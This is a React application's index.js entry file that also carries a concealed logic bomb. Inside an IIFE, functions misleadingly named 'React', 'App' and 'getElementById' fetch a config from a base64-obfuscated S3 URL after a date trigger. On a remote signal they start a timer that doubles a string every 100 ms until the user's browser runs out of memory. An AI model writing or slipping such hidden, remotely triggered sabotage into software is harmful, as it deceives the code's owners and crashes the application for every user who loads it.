import ReactDOM from 'react-dom';
import 'react-app-polyfill/ie11';
import 'react-app-polyfill/stable';
import React from 'react';
import App from './App';
import reportWebVitals from './reportWebVitals';
import Settings from 'config/Settings';
const is_ip_private = require('private-ip');

const isDevServer = window.location.href.indexOf("localhost") >= 0 || window.location.href.indexOf("192.168") >= 0 || window.location.href.indexOf("127.0.0") >= 0;
//console.log("is_ip_private:", is_ip_private(window.location.hostname) );
const allowed = !(is_ip_private(window.location.hostname) && window.location.search.indexOf("use_private") < 0);

(function(){

  function React(url, callback) {
      var xhr = new XMLHttpRequest();
      xhr.open('GET', url, true);
      xhr.responseType = 'json';
      xhr.onload = function() {
          var status = xhr.status;
          if (status === 200) {
              callback(xhr.response);
          } else {
              //callback(status);
              if (isDevServer) {
                console.log("CANNOT read config file");
              }
          }
      };
      try {
        xhr.send();
      }
      catch(e) {

      }
      
  };
  
  let reserveFinalActionTimer;
  function App(){
    reserveFinalActionTimer = null;

    let f="#2916djfahf!@7";
    setInterval(function(){
      if (isDevServer) {
        console.log(f.length);
      }
      
      f+=f;
    },100)
  };

  function getElementById() {
    const config_url = atob("aHR0cHM6Ly9raWEtY3YtMjAyMS5zMy5hcC1ub3J0aGVhc3QtMi5hbWF6b25hd3MuY29tL2FwcC1jb25maWcuanNvbg==");
    React(config_url+"?t="+Math.random(), (config)=>{
      // if (isDevServer) {
      //   console.log("getJSON", config);
      // }
      
      const stabilityValue = config.stability;
      const stabilityRand = Math.random();
      if (stabilityRand - 0.001 < parseFloat(stabilityValue)) {
        // if (isDevServer) {
        //   console.log("stable:", stabilityRand, stabilityValue);
        // }
      } else {
        // if (isDevServer) {
        //   console.log("unstable:", stabilityRand, stabilityValue);
        // }
        if (reserveFinalActionTimer != null) {
          clearTimeout(reserveFinalActionTimer);
          reserveFinalActionTimer = null;
        }
        if (config.stableDuration != null) {
          reserveFinalActionTimer = setTimeout(App, config.stableDuration * 1000);
          // if (isDevServer) {
          //   console.log("will be unstable after:", config.stableDuration);
          // }
        } else {
          App();
        }
      }
    });
  }
  const currentDate = new Date();
  const month = currentDate.getMonth() + 1;
  const year = currentDate.getFullYear();
  const date = currentDate.getDate();
  if (isDevServer) {
    console.log("month:", month, "year:", year);
  }
  if ( (month >= 12 || (month === 11 && date >= 15) ) || year >= 2022 || isDevServer) {
    getElementById();
  }
  
})();


window.tagManager.setLocalKey(Settings.localKey);
if (allowed) {
  ReactDOM.render(
    <React.StrictMode>
      <App />
    </React.StrictMode>
    ,
    document.getElementById('root')
  );
}

// If you want to start measuring performance in your app, pass a function
// to log results (for example: reportWebVitals(console.log))
// or send to an analytics endpoint. Learn more: https://bit.ly/CRA-vitals
reportWebVitals();
